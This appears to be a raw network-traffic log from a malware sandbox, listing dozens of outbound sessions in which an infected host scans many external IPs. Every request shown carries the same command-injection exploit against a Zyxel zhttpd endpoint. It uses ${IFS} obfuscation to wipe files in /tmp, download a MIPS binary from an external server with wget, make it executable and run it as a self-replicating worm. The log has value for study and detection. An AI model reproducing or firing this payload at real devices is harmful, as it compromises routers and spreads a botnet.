                                            Feb 2, 2024 06:21:22.829565048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7180192.168.2.154991417.216.219.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.829592943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7181192.168.2.1534934114.184.215.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.829637051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7182192.168.2.1548382207.206.87.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.829658031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7183192.168.2.155658873.169.64.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.829705000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7184192.168.2.154692017.60.25.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.829730988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7185192.168.2.1549946210.239.52.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.829772949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7186192.168.2.155575848.206.58.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.829804897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7187192.168.2.155090693.62.54.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.829840899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7188192.168.2.155827689.247.30.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.829899073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7189192.168.2.155130261.247.12.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.829922915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7190192.168.2.1557926209.234.44.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.829958916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7191192.168.2.1554252190.252.162.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.829972029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7192192.168.2.154146860.199.0.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.830033064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7193192.168.2.154821090.119.190.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.830058098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7194192.168.2.1547508168.6.252.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.830106020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7195192.168.2.1541278151.60.90.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.830133915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7196192.168.2.155167478.215.82.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.830159903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7197192.168.2.1560300156.115.53.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.830193043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7198192.168.2.155844679.143.33.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.830228090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7199192.168.2.154865071.39.178.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.830274105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7200192.168.2.1536440186.194.147.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.830574989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7201192.168.2.155612434.243.56.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.843698978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7202192.168.2.1553140124.31.57.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842335939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7203192.168.2.1534736190.77.158.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842470884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7204192.168.2.1555904129.101.69.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842504025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7205192.168.2.153962013.154.140.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842545986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7206192.168.2.1540628139.12.190.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842585087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7207192.168.2.154476043.232.120.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842605114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7208192.168.2.1538908198.186.211.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842658997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7209192.168.2.1536422178.192.35.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842690945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7210192.168.2.155942218.68.194.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842704058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7211192.168.2.1559600206.128.29.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842756987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7212192.168.2.1534934152.252.45.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842808962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7213192.168.2.1532984120.145.15.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842849016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7214192.168.2.1550812103.245.42.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842885017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7215192.168.2.1541048125.109.228.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842932940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7216192.168.2.154224441.115.213.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.842968941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7217192.168.2.1546208191.113.241.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843003035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7218192.168.2.155662089.110.224.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843049049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7219192.168.2.155034099.170.131.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843079090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7220192.168.2.155582632.11.144.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843105078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7221192.168.2.153427448.45.126.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843166113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7222192.168.2.1557638122.4.19.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843199968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7223192.168.2.154019253.238.98.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843241930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7224192.168.2.1535556109.61.188.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843296051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7225192.168.2.1537174217.133.173.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843333960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7226192.168.2.15372782.94.78.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843362093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7227192.168.2.1551650165.11.251.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843411922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7228192.168.2.154447293.244.113.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843451977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7229192.168.2.155710217.95.227.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843602896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7230192.168.2.153869234.180.126.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843635082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7231192.168.2.153713097.66.247.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843674898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7232192.168.2.1539844105.141.25.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843724012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7233192.168.2.1551944131.129.176.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843750954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7234192.168.2.154306085.154.139.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843785048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7235192.168.2.155057045.6.110.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843830109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7236192.168.2.1554840179.146.31.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843859911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7237192.168.2.1540050169.254.7.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843877077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7238192.168.2.1555090153.216.28.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843934059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7239192.168.2.15345285.71.14.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.843966961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7240192.168.2.156084490.202.42.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844008923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7241192.168.2.153804443.35.94.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844043970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7242192.168.2.1543272201.164.178.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.844084978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7243192.168.2.1554092132.32.32.141443
                                            TimestampBytes transferredDirectionData
